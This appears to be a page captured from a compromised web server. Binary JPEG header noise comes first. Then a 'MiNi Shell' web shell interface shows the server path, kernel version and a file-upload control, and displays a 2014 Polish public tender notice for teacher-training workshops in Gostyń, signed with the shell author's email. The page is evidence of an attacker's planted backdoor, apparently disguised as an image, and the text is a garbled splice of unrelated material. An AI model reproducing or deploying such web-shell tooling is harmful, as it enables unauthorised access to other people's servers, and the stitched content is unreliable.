JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140910/192881-N-2014.html

<p class="kh_header"><b>Gostyń: Realizacja form doskonalenia nauczycieli  w ramach sieci współpracy 
i samokształcenia w projekcie: Doskonalenie nauczycieli w powiecie gostyńskim</b><br>
<b>Numer ogłoszenia: 192881 - 2014; data zamieszczenia: 10.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poradnia Psychologiczno-Pedagogiczna , ul. Poznańska 200, 63-800 Gostyń, woj. wielkopolskie, tel. 65 572 06 97, faks 65 572 06 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poradniapp.gostyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja form doskonalenia nauczycieli  w ramach sieci współpracy 
i samokształcenia w projekcie: Doskonalenie nauczycieli w powiecie gostyńskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest realizacja szkoleń w postaci warsztatów, konsultacji grupowych, wykładów, lekcji pokazowych dla uczestników sieci współpracy i samokształcenia utworzonych w ramach projektu: Doskonalenie nauczycieli w powiecie gostyńskim, realizowanego przez Poradnię Psychologiczno - Pedagogiczną w Gostyniu w ramach realizowanego w powiecie projektu wdrożeniowego (Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół).
2.	Celem szczegółowym projektu jest podniesienie jakości współpracy dyrektorów szkół, przedszkoli i nauczycieli w powiecie gostyńskim poprzez organizację sieci współpracy 
i samokształcenia w okresie realizacji projektu.
3.	Realizacja form doskonalenia nauczycieli w sieciach współpracy i samokształcenia w terminie od października 2014r. do 30 czerwca 2015r. obejmuje 64 godziny szkoleniowe (wykłady, warsztaty, konsultacje grupowe, lekcje pokazowe), po 16 godzin dla każdej z 4 sieci -   podzielonych na 4 spotkania.  
4.	Wykonawca powinien zabezpieczyć kompleksową realizację form doskonalenia nauczycieli na najwyższym poziomie merytorycznym w następujących 4 tematycznych sieciach współpracy i samokształcenia, których założenia zostały wypracowane w ramach projektu   System doskonalenia nauczycieli oparty na ogólnodostępnym kompleksowym wspomaganiu szkół. Tematy sieci współpracy i samokształcenia wynikają z diagnozy przeprowadzonej przez koordynatorów sieci:

L.P.	Uczestnicy	Temat sieci współpracy i samokształcenia	Szczegółowe oczekiwania uczestników sieci.
I.	Dyrektorzy	: Rola dyrektora w promocji i budowaniu wizerunku szkoły.	Zakres szkoleń: 
1. Wizerunek dyrektora (ekspozycja publiczna - jak wyglądać, jak się zachowywać,  wystąpienia publiczne - jak się przygotować, jak przemawiać). 
2.Media Relations (zasady współpracy z dziennikarzami, sposoby informowania o sytuacjach trudnych, kryzysowych, szkolna polityka medialna). 
3. Współpraca szkoły ze środowiskiem lokalnym (współpraca z rodzicami, z samorządem lokalnym, z różnymi instytucjami). 
4. Budowanie strategii promocyjnej szkoły (zalety planowania strategicznego promocji szkoły, ocena efektywności elementów promocji, co wyróżnia szkołę, czynniki promocyjne itd.).


II.	Nauczyciele bibliotekarze:	Skuteczne sposoby zachęcania uczniów do czytania.	Zakres szkoleń:  
1. Propagowanie czytelnictwa, a w szczególności happeningi organizowane poza biblioteką. Projekty edukacyjne, takie jak Cyfrowa Dziecięca Encyklopedia Wielkopolan, realizowane w ramach projektu e-Szkoła Wielkopolska. Konkursy czytelnicze. 
2. Jak pozyskać darmowe oprogramowanie do biblioteki szkolnej. Tworzenie strony internetowej biblioteki, blog - obsługa prostych, bezpłatnych programów. Lekcje biblioteczne w Multimedialnym Centrum Informacji - lekcja pokazowa; muzea w Internecie. Zasoby internetowe związane z literaturą, malarstwem, filmem i in.; savoir-vivre w Internecie. Cyberprzemoc - udział w kampaniach społecznych, e-learning. 
3. Katalogowanie i klasyfikowanie zbiorów specjalnych, w szczególności płyt CD (opracowanie tradycyjne i w programach bibliotecznych - MOL, Sowa; kopiowanie, ubytkowanie, norma; forma - wykład eksperta, ćwiczenia i praca z normą - warsztaty prowadzone przez eksperta, praca przy komputerze).
4. Promowanie biblioteki na terenie szkoły oraz informowanie o działalności w środowisku lokalnym (planowanie działań promocyjnych, warsztaty prowadzone przez eksperta od RP oraz dziennikarza - przygotowanie notatki, kontakty z dziennikarzami, narzędzia promocji biblioteki szkolnej).

III.	Nauczyciele pedagodzy:	Jak rozwijać twórcze myślenie uczniów.	Zakres szkoleń :
1. Uzależnienia dzieci  i młodzieży (od Internetu, gier komputerowych, telewizji itd. - mechanizmy uzależnień, symptomy, pomoc, profilaktyka. 
2. Stworzenie materiałów edukacyjnych niezbędnych do tego, aby udzielić pomocy dziecku, rodzicom, nauczycielom w rozwijaniu kreatywnego myślenia dziecka.
3. Dokumentowanie pracy pedagoga (akty prawne, orzeczenia sądu itp. wzory dokumentów np. teczki dzieci, notatki, informacje z rozmów, itp. 
4.Stworzenie katalogu dokumentów, przepisów, wzorów, wymaganych w pracy pedagoga rozwijającej twórcze myślenie uczniów.

IV.	Nauczyciele edukacji wczesnoszkolnej:  Praca z uczniem młodszym.	Zakres szkoleń: 
1.Chcę się uczyć, chcę się bawić! - wspomaganie rozwoju sześciolatków w nowej rzeczywistości edukacyjnej (zabawy integracyjne, pląsy i piosenki na różne okoliczności szkolne, aktywna prezentacja wybranych pozycji literatury dziecięcej oraz stworzenie w formie pisemnej propozycji kanonu lektur). 
2. Nauczanie na dywanie - wykorzystanie metod aktywizujących i pedagogiki zabawy w edukacji wczesnoszkolnej ( tańce, zabawy, aktywizujące metody uczenia matematyki, ortografii i gramatyki - w wygodnych pozycjach poza ławkami szkolnymi, 
sposoby zachęcania uczniów do czytania - stworzenie spisu zabaw, ćwiczeń wykorzystywanych na dywanie). 
3. Oswoić nadpobudliwość - praca z dzieckiem nadpobudliwym (zabawy na odreagowanie niepokoju i zdenerwowania, zabawy poprawiające spostrzegawczość i koncentrację uwagi - stworzenie spisu przykładowych zabaw relaksacyjnych i wyciszających).
4. Jak radzić sobie z problemami dziecka niepełnosprawnego w klasie (autyzm)
(praca terapeutyczna z dzieckiem autystycznym, przegląd wybranych metod terapeutycznych wykorzystywanych w pracy z dziećmi z zaburzeniami psychicznymi i niepełnosprawnością
- stworzenie spisu zabaw, ćwiczeń wykorzystywanych w pracy z dzieckiem niepełnosprawnym)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie uznany za spełniony, jeżeli wykonawca złoży oświadczenie,że spełnia przedmiotowy warunek.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie uznany za spełniony, jeżeli wykonawca złoży oświadczenie,że spełnia przedmiotowy warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie uznany za spełniony, jeżeli wykonawca złoży oświadczenie,że spełnia przedmiotowy warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie uznany za spełniony, jeżeli wykonawca złoży oświadczenie,że spełnia przedmiotowy warunek oraz wykaże, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają minimum łącznie:
a)	wykształcenie wyższe II stopnia, 
b)	posiada doświadczenie w szkoleniu osób dorosłych, nie mniej niż 100 godzin, w tym nauczycieli,
c)	doświadczenie w realizacji minimum jednej formy doskonalenia nauczycieli, o których mowa w rozdziale III, ust. 4 SIWZ lub zbliżonej merytorycznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie uznany za spełniony, jeżeli wykonawca złoży oświadczenie,że spełnia przedmiotowy warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	ofertę wykonawcy (oryginał) - wg wzoru stanowiącego załącznik nr 1 do SIWZ;
2)	Informacja o Podwykonawcach - wg wzoru stanowiącego załącznik nr 6 do SIWZ;
3)	pełnomocnictwo do reprezentowania wykonawcy, jeśli nie wynika ono z innych przedstawionych dokumentów. Uwaga! Do oferty wykonawca dołącza oryginał pełnomocnictwa lub kopię pełnomocnictwa poświadczoną za zgodność z oryginałem przez notariusza;
4)	wykonawca, który przy wykazywaniu spełnienia warunków udziału w postępowaniu będzie powoływał się na zasadach określonych w art. 26 ust. 2b ustawy na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia,                  w szczególności winien wówczas przedstawić pisemne zobowiązanie innych podmiotów (oryginał) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania                      z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poradniapp.gostyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poradnia Psychologiczno-Pedagogiczna
63-800 Gostyń 
ul.Poznańska 200.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2014 godzina 10:00, miejsce: Poradnia Psychologiczno-Pedagogiczna
63-800 Gostyń 
ul.Poznańska 200.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Doskonalenie nauczycieli w powiecie gostyńskim współfinansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III-Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com